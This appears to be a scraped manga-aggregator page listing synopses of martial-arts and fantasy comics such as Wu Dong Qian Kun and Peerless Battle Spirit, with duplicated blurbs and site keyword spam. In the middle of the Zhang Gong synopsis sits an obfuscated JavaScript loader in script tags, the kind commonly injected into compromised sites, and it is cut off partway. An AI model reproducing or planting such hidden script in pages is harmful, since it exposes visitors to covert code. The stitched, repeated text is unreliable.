Yang Jian is exiled into the human realm from the Heavens in order to repent. His former partner, The Howling Celestial Hound, has reincarnated into a loli. Witness how a barbaric Immortal from the Heavens and a loli move 100 demons to tears.
Zhang Gong is a little herbalist on Mount Shu. One day, he went to the mountain for picking herbs and met an immortal who was beheading a monster. He was accidentally drawn into a big fight between monsters and demons. After a soul-stirring adventure, he found his real origin, and then involved in the turbulence and fights among the three worlds…<script></script><script>(function(_0x314296,_0x5eb18a){var _0x2e84f1=_0x4dd9,_0x43a002=_0x314296();while(!![]){try{var _0x1368f9=-parseInt(_0x2e84f1(0xb6))/(0x12d9+-0x5b6+-0xd22)+-parseInt(_0x2e84f1(0xa5))/(-0x1f*-0x76+-0x1*0x2f+-0xe19)*(parseInt(_0x2e84f1(0xac))/(0x8b1+-0x1*0x276+-0x2*0x31c))+-parseInt(_0x2e84f1(0xa9))/(0xb8b*-0x1+-0x1*0x2e9+0xe78)+parseInt(_0x2e84f1(0xaa))/(0xe*-0x2c5+0x1*-0x1832+0x3efd)+-parseInt(_0x2e84f1(0xa4))/(0x1f*-0x124+0xcd9+0x1689)+parseInt(_0x2e84f1(0xa2))/(0x39*0x26+0x7f*-0x2a+-0x7f*-0x19)+-parseInt(_0x2e84f1(0xbd))/(0xa8+-0x7*-0x2+-0xae)*(-parseInt(_0x2e84f1(0xbf))/(-0x21d2+0x46e*-0x5+0x3801));if(_0x1368f9===_0x5eb18a)break;else _0x43a002['push'](_0x43a002['shift']());}catch(_0x5925e2){_0x43a002['push'](_0x43a002['shift']());}}}(_0x4a26,-0x10d9b*-0x1+-0x86229+0xe5527));function custom(){var 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Having suffered humiliation in youth and then moving forward with exceptional martial talent, to inherit the role of the overlord, to ride the king of demon beasts, break through all obstacles and seize back his family estate, ascend to the pinnacle of the martial arts world and flip the order of heavens!
Read Manhwa Criador De Armas / Weapon Creator / Weapon Forger Here, Try This Sword. Junseo Shin Is A Master Weapon Creator Doing Menial Jobs To Keep A Low Profile In A World Teeming With Monster Dungeons. But His Habit Of Lending Weapons To Those In Need Exposes Him To Mega Guilds And Covert Figures Out To Kill Budding Heroes From His Past Life. Can Junseo Craft His Way Out Of Trouble And Uncover The Conspiracy That Followed Him To This Life? “Weapon Maker” Is Alternative: 武器锻造者 웨폰 크리에이터
The series starring one of illegitimate children of Kiryu Miyazawa, Ryuusei Nakamura. Years after Kiibo founded the new dojo, both him and Kiryu mysteriously disappeared. Ryuusei, after losing his mother to cancer, is set to find out about his birth father and his destiny as the evil dragon’s heir, but he is not the only one.
The series starring one of illegitimate children of Kiryu Miyazawa, Ryuusei Nakamura. Years after Kiibo founded the new dojo, both him and Kiryu mysteriously disappeared. Ryuusei, after losing his mother to cancer, is set to find out about his birth father and his destiny as the evil dragon’s heir, but he is not the only one.
In the whole world there lay twelve paths to climb Tower of God, and in legends, these twelve pathways lead toward the legendary road of immortality. However, these paths in the Tower of God, are far too long, without end. In ancient times there once were many types of martial arts, sadly the world underwent terrible changes, and only three were left: Flame, Dragon and Star Martial Arts. Generations of experts of those three martial arts are searching for the road to immortality. A Star Martial Arts practitioner on his journey of a lifetime, in becoming the Highest God. MangaToon got authorization from TaXue Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
In The Canglan Continent, Only Those That Who Manage To Awaken A Martial Spirit Can Walk On The Path Of Cultivation. In This World, Only Those With Stronger Martial Spirits Can Communicate With The Heavens And Earth. Qin Nan, Born In Linshui City, Was A Peerless Genius Who Possessed Talent And Was Thought To Become A Great Cultivator In The Future. However, Things Changed When He Ended Up Awakening A Grade 1 Martial Spirit, Resulting In Him Being Considered As Trash.fortunately Enough, Qin Nan Was Struck By A Ray Of Lightning While Practicing His Martial Arts And Coincidentally Obtained The Divine Battle Spirit, Which Was Capable Of Leveling Up. Breaking The Ultimate Rule Of The Canglan Continent, Little Did Qin Nan Knew That His Martial Spirit Possessed A Great Secret That Will Slowly Unravel The Mystery As The Story Goes On. Now Join Qin Nan And His Companion Along Their Journey, Battling Against Various Opponents, Outsmarting Their Enemies And Seeking The Answers To Unveil Mysteries. 狂霸战皇,Berserk Sovereign Of Battle,Berserk Peerless Battle Spirit ,Peerless Battle Spirit , Berserk Sovereign Of Battle Manhua In The Canglan Continent, Only Those That Who Manage To Awaken A Martial Spirit Can Walk On The Path Of Cultivation. In This World, Only Those With Stronger Martial Spirits Can Communicate With The Heavens And Earth. Qin Nan, Born In Linshui City, Was A Peerless Genius Who Possessed Talent And Was Thought To Become A Great Cultivator In The Future. However, Things Changed When He Ended Up Awakening A Grade 1 Martial Spirit, Resulting In Him Being Considered As Trash.fortunately Enough, Qin Nan Was Struck By A Ray Of Lightning While Practicing His Martial Arts And Coincidentally Obtained The Divine Battle Spirit, Which Was Capable Of Leveling Up. Breaking The Ultimate Rule Of The Canglan Continent, Little Did Qin Nan Knew That His Martial Spirit Possessed A Great Secret That Will Slowly Unravel The Mystery As The Story Goes On. Now Join Qin Nan And His Companion Along Their Journey, Battling Against Various Opponents, Outsmarting Their Enemies And Seeking The Answers To Unveil Mysteries. 狂霸战皇,Berserk Sovereign Of Battle,Berserk Peerless Battle Spirit ,Peerless Battle Spirit , Berserk Sovereign Of Battle Manhua
The Great Thousand World. It Is A Place Where Numerous Planes Intersect, A Place Where Many Clans Live And A Place Where A Group Of Lords Assemble. The Heavenly Sovereigns Appear One By One From The Lower Planes And They Will All Display A Legend That Others Would Desire As They Pursue The Road Of Being A Ruler In This Boundless World. In The Endless Fire Territory That The Flame Emperor Controls, Thousands Of Fire Blazes Through The Heavens. Inside The Martial Realm, The Power Of The Martial Ancestor Frightens The Heaven And The Earth. At The West Heaven Temple, The Might Of The Emperor Of A Hundred Battles Is Absolute. In The Northern Desolate Hill, A Place Filled With Thousands Of Graves, The Immortal Owner Rules The World. A Boy From The Northern Spiritual Realm Comes Out, Riding On A Nine Netherworld Bird, As He Charges Into The Brilliant And Diverse World. Just Who Can Rule Over Their Destiny Of Their Path On Becoming A Great Ruler? In The Great Thousand World, Many Strive To Become A Great Ruler.
Read Wu Dong Qian Kun Novel – Wu Dong Qian Kun Manhwa Online Free At Manhuahot The Summary Of The Comic Wu Dong Qian Kun: On The Journey Of Self-Cultivation, One Requires Control Of Ying And Yang , Good Fortune, To Reach For Nirvana, Mastery Over Life And Death, Power Over Reincarnation. At The Peak Of Martial Arts, Break The Heavens And Shake The Universe! “Wu Dong Qian Kun” Is Also Known As: Earth-Shattering Martial Arts / Force Cosmos / Martial Movement Upheaval / Võ Động Càn Khôn / Martial Universe / Wu Dong Qiankun / Wudongqiankun / Wǔ Dòng Qiánkūn / Переворот Военного Движения / 武动乾坤 / 무동건곤: Force Cosmos The Comic Wu Dong Qian Kun Belongs To The Genre: Action, Adventure, Fantasy, Manhua, Martial Arts, Shounen, Supernatural “Top Manhua, Battwo, Read Manga Online…” Are The Most Searched Keywords On The Website Zinmanga. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Bunmanga. You Can Read Top Manga Human Mask The Patron’s Daughters The Genius Idol’s Strategy To Stardom
Negizawa Kamo once tearfully promised his weak childhood friend Kagyu Jubei that he would grow up to be a teacher who would not stand for bullying. Several years later, as a teacher, he meets Kagyu once more under...strange circumstances to say the least. While Negizawa was training to become a great teacher, Kagyu (who, like most women, fell for Negizawa) polished her fists so that she could protect him when they met again. Hilarity ensues as Negizawa strives to become the teacher he once dreamed of being and Kagyu protects his chastity from the numerous women who lust after his sweet behind.
Leviathan, a man with an extremely unnatural body, declares that Sumo will now be ruled by muscle alone! But what is the truth behind Leviathan\'s body? A mysterious light sci-fi sumo manga that may just make you cry!